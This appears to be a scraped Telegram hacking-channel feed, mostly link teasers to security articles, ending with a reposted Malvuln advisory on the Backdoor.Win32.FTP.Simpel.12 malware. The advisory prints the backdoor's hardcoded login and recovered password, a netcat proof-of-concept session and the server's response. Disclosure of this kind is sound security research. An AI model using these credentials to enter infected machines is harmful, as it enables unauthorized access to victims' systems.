Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
CVE-2021–38314 Leads to Sensitive Information Disclosure

Hello Hackers!Continue reading on Medium »
Read more...
Bypassing HttpOnly with phpinfo file

While doing Web Application assessment with Higgsx, We found stored Cross-Site Scripting(XSS) which was a nice finding but we could not…Continue reading on Medium »
Read more...
[Campaign] — HappyLand testnet invitation!

HappyLand Testnet will arrive at the end of December and we are super thrilled to welcome you. This is an opportunity to let you imagine…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Reverse Shell Generator

https://cdn-images-1.medium.com/max/628/0*h9PfoUF-IHVU3QGD.png
Através de uma plataforma Web você consegue utilizar um gerador de conexão reversa de diversos tipos de conexões para Windows, Linux e MAC.

Continue reading on 100security »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Bounty Hacker — TryHackMe Writeups (Resolução)

https://cdn-images-1.medium.com/max/780/1*TTR5WaocSa3OmldKWJHCcA.png
Para quem está iniciando na área de segurança essa máquina é um excelente começo pois aborda todas as etapas como scanning, brute-force…

Continue reading on Medium »
Hi everyone Align Technology, Inc. is a manufacturer of 3D digital scanners and the Invisalign clear aligners used in orthodontics.It is…Continue reading on Medium » (https://medium.com/@amnotacat/ssrf-in-align-technology-inc-52df0d3e3c0a?source=rss------bug_bounty-5)
In this blog, I will be listing down some file upload Vulnerability such RCE, SSRF, CSRF, XSS and many more such vulnerabilities.Continue reading on Medium » (https://sm4rty.medium.com/hunting-for-bugs-in-file-upload-feature-c3b364fb01ba?source=rss------bug_bounty-5)
hacking: security in practice
Is hacking available on phone??

Hii guys i want to learn hacking i am very new to this field and i want to know that do i able to practice hacking on mobile phone?? I don't have a pc 😕

submitted by /u/Independent_Feed_985
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.FTP.Simpel.12 Insecure Crypto Implementation

https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png Backdoor.Win32.FTP.Simpel.12 malware uses MD5 with no salt for password storage.

MD5 | 60cb7770471dce0b613f578b6ee420dbDownload Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/1d12f9b921b38d7b521f12442bdd52d8_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.FTP.Simpel.12
Vulnerability: Insecure Crypto
Description: The malware listens on TCP port 22, authentication is required to access the server. However, the password hash "!supernova" is stored within the executable using an insecure MD5 hash algorithm and no salt. MD5 is a basic purpose fast hash (not slow) and not using salt allows attackers that gain access to the hash ability to conduct faster cracking attacks using pre-computed dictionaries. Finally, the password is easily recovered as it is a known password hash which can be found online. Third-party intruders who successfully gain access then may be able to upload executables which may result in remote code execution.

E.g.

Name=cRaCkeN
Pass=E13820BEDF2B31E01B2C7E59404B1FB7 = !supernova

Type: PE32
MD5: 1d12f9b921b38d7b521f12442bdd52d8
Vuln ID: MVID-2021-0433
Disclosure: 12/27/2021

Exploit/PoC:
nc64.exe x.x.x.x 22

USER cRaCkeN
331 Password required for cRaCkeN.
PASS !supernova
230- [LOGIN]
230- [SYSTEM]
230-
230- Aktiv seit : 1 d, 7 h, 41 min, 57 sec
230-
230- [SERVER]
230-
230- Server ist aktiv seit : 28 min, 44 sec
230- Server ist aktiv als : Victim
230- Traffic (Up/Down) : 0.00/0.00 MB
230- Geschw. (Up/Down) : 0/0 KB/sec.
230- Bester Speed (Up/Down): 0/0 KB/sec.
230- Durchschnitsspeed : 0 KB/sec. genutzt. ││
230- ││ SpaceFree : 26197.29 MB ││
230- ││ Benutzer derzeit : 1 von Max. 100 ││
230- ││ ││
230- │├──────────────────────────────[USER]───────────────────────────────┤│
230- ││ ││
230- ││ Willkommen : cRaCkeN
230- Sie sind User : 0 von max. 0 mit ihrem Account
230- Ratio : 1:-1 (Credits: 15 MB)
230- Ihre IP ist : 192.168.18.130
230-
230-
230-
230 User cRaCkeN logged in.
SYST
215 215 UNIX Type: L8
MKD HATE
257 Directory created
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com